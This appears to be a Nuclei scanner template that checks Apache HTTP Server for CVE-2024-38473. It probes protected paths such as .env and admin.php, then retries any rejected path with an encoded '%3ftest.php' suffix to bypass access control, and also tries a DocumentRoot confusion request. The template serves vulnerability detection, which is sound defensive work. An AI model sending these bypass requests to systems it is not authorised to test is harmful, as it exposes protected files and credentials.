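id: CVE-2024-38473

info:
  name: Apache HTTP Server - ACL Bypass
  author: pdteam
  severity: high
  description: |
    Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests.
  remediation: |
    Fixed in v2.4.60
  reference:
    - https://blog.orange.tw/2024/08/confusion-attacks-en.html#%E2%9A%94%EF%B8%8F-Primitive-1-2-ACL-Bypass
    - https://www.cvedetails.com/cve/CVE-2024-38473/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-38473
    - https://httpd.apache.org/security/vulnerabilities_24.html
    - https://security.netapp.com/advisory/ntap-20240712-0001/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 8.1
    cve-id: CVE-2024-38473
    cwe-id: CWE-116
    epss-score: 0.00043
    epss-percentile: 0.09569
    cpe: cpe:/a:apache:http_server, cpe:/a:apache:httpd
  metadata:
    # NOTE(review): the payload list below was de-duplicated; confirm this
    # value still reflects the request count the template validator computes.
    max-request: 10
    vendor: Apache Software Foundation
    product: Apache HTTP Server
    google-query: intitle:"Apache HTTP Server" inurl:"/server-status"
  tags: cve,cve2024,apache,acl-bypass,mod_proxy,php-fpm

# http(2) only runs when http(1) produced an (internal) match; http(3) is an
# independent check and runs on its own.
flow: |
  http(1) && http(2)
  http(3)

http:
  # Path normalization ACL bypass.
  # Request 1: find a path the front-end access control rejects (401/403).
  # The match is internal, i.e. it is not reported on its own - it only
  # selects the path for request 2 via {{http_1_files}}.
  - method: GET
    path:
      - "{{BaseURL}}/{{files}}"

    payloads:
      files:
        # Each entry is requested once; duplicates only cost extra requests.
        - admin.php
        - adminer.php
        - xmlrpc.php
        - .env
        - php-info.php
        - php_info.php
        - phpinfo.php
        - info.php
        - bin/cron.php
        - cache/index.tpl.php
        - cpanel.php

    # Stop at the first rejected path so request 2 works with a single value.
    stop-at-first-match: true
    matchers:
      - type: status
        status:
          - 403
          - 401
        internal: true

  # Request 2: the same path with an encoded "?" appended. A 200 for a path
  # that was just rejected is the template's indicator that the ACL decision
  # did not apply to the forwarded request.
  - method: GET
    path:
      - "{{BaseURL}}/{{http_1_files}}%3ftest.php"

    matchers:
      - type: status
        status:
          - 200

  # DocumentRoot confusion: a file outside the intended web root being served
  # is detected by its known contents (both strings must be present).
  - method: GET
    path:
      - "{{BaseURL}}/html/usr/share/doc/hostname/copyright%3f"

    matchers:
      - type: word
        words:
          - "On Debian systems, the complete text of the GNU General Public License"
          - "This package was written by Peter Tobias"
        condition: and
# NOTE(review): the digest below was computed over the original template
# content; the template must be re-signed after any edit for it to verify.
# digest: 490a0046304402205cd0da1409f51dd532886e421bf2e98bd45232f7fbccc13ca770cd55f0fb8184022055b6f4500bb9403946dce14f03fa2876b3f44a02dfd549d7958d83c84744b4af:922c64590222798bb761d5b6d8e72950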